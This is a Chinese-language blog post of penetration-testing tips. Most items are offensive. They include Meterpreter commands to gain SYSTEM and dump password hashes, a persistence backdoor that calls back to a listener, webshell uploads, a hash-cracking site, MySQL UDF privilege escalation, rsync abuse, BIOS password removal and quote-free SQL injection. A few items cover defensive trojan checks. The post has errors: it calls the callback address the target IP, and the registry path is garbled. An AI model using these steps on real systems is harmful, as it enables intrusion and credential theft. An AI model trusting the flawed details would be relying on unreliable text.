滲透測試筆記四
滲透筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。
1、在Webshell中,如果上傳文件時提示缺少對象。可以嘗試寫一句話,用菜刀連接之后用菜刀上傳文件。
2、使用meterpreter的hashdump提取windows口令的哈希值:
- meterpreter > getuid //獲知當(dāng)前權(quán)限級別
- meterpreter > getsystem //提升權(quán)限
- meterpreter > run hashdump
3、網(wǎng)站http://www.md5decrypter.co.uk/,可提供對NTLM/LM hash值的在線解密(小編注:這個網(wǎng)站破解MD5的命中率也很高哦)。
3、使用meterpreter建立后門:
- meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.1
- -A參數(shù)用于在攻擊方機(jī)器上自動啟動監(jiān)聽程序。
- -S參數(shù)表示將后門程序設(shè)置為Windows系統(tǒng)啟動時加載。
- -U參數(shù)表示后門設(shè)置為用戶登陸系統(tǒng)時自動執(zhí)行。
- -i參數(shù)用于設(shè)置后門回連到代理處理程序的時間間隔
- -p是端口號
- -r是目標(biāo)機(jī)器的ip地址
4、網(wǎng)絡(luò)縱深防御思想:作為一個公司,它會為物理線路聘用一個巡線員(第一層),在工作組交換機(jī)上做端口安全(第二層),在邊界路由器上做訪問列表(第三層),在防火墻中建立DMZ區(qū)和包過濾(第四層),設(shè)置IDS/IDP監(jiān)測/阻攔(第三至七層),建立SSL通道(第六層),設(shè)置內(nèi)容過濾(第七層),提供AAA服務(wù)(第七層),進(jìn)行漏洞掃描(第四至七層)和病毒掃描(第七層)等。
——摘自《IT安全面試攻略》
5、IPS設(shè)備可以提供攻擊檢測和防御兩種功能,如果以鏡像方式接入,就使用反應(yīng)機(jī)制;如果以串行方式接入,就使用阻斷機(jī)制。
6、根據(jù)ip獲知對方電腦的名稱:ping -a ip地址,
如:ping -a 192.168.235.253

7、在系統(tǒng)“windows”文件夾下,點擊打開“system.ini”文件,在代碼中如果有[boot]代碼,其中shell語句的格式一般為“shell=文件名”,如果后面還跟有一個文件名(如shell=文件名+文件名),則很可能是木馬程序。
8、在系統(tǒng)“windows”文件夾下,點擊打開“win.ini”文件,在代碼中如果有“run=?”或者“load=?”代碼類型,一定要注意其后的文件。一般情況下,“run=”和“load=”后面就沒有內(nèi)容了,如果有路徑或不熟悉的文件名,可能就是木馬程序。
9、木馬隱藏的方式很多,一般都隱藏在注冊表的
1HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
目錄下。查看鍵值中有沒有不熟悉的可執(zhí)行文件,該類文件可能就是木馬程序。
10、專門捕獲網(wǎng)頁的嗅探器——艾菲網(wǎng)頁偵探:艾菲網(wǎng)頁偵探是一個HTTP協(xié)議的網(wǎng)絡(luò)嗅探器,專門捕捉局域網(wǎng)中含有HTTP協(xié)議的數(shù)據(jù)包,并對其進(jìn)行分析,找出符合過濾器的那些HTTP通信內(nèi)容。
11、常見的windows XP系統(tǒng)漏洞:RDP漏洞、遠(yuǎn)程明文賬戶名傳送漏洞、UPnP緩沖溢出漏洞、熱鍵漏洞、拒絕服務(wù)漏洞
12、常見window 7系統(tǒng)漏洞:內(nèi)核驅(qū)動程序中的漏洞、輔助驅(qū)動程序中的漏洞、IE的積累性安全更新漏洞、顏色控制面板中的漏洞、.NET和Silverlight中的漏洞、SharePoint中的漏洞。
13、清除BIOS密碼之魔法攻擊法:如果你能進(jìn)入系統(tǒng),可以用BiosPwds、CmosPwd等軟件清除。(小編注:一般就別想了)
14、清除BIOS密碼之物理攻擊法:關(guān)閉電源,將主板上的正確跳線帽用專業(yè)工具挑出,將跳線帽由原來標(biāo)示為“1”、“2”針腳套在標(biāo)示為“2”、“3”的針腳上,再將跳線帽復(fù)原,打開電源,即可發(fā)現(xiàn)BIOS密碼已清除。如果遇到較老的機(jī)子,可是拆掉電池、再用導(dǎo)電工具短接清除密碼。
15、mysql數(shù)據(jù)庫擁有讀寫文件權(quán)限時,成功寫入文件的條件需單引號不轉(zhuǎn)義、不可覆蓋已存在文件、必須為最后一條語句。因此magic_quotes_gpc必須為0ff。
16、滲透提權(quán)過程中,得知mysql數(shù)據(jù)庫連接賬號和密碼時可以嘗試UDF方式提權(quán),前提是系統(tǒng)必須為windows。當(dāng)然如果權(quán)限高的話,還可以使用mof寫入系統(tǒng)的方式提權(quán)。
17、滲透過程中如目標(biāo)開啟rsync服務(wù),默認(rèn)873端口,可嘗試無口令登錄,權(quán)限設(shè)置不足的可直接上傳文件,最不濟(jì)也可查看目標(biāo)站點文件。
18、端口轉(zhuǎn)發(fā)時如果lcx不起作用,可嘗試reduh這個工具,不過速度稍微有點捉急!(其實那速度會讓你有砸鍵盤的沖動)
19、數(shù)字型注入中,無單引號注入方法有兩種,一種是定義注入字符串為16進(jìn)制賦值變量@r,然后exec(@r)執(zhí)行;另外一種是使用char()函數(shù)和“+”號來進(jìn)行。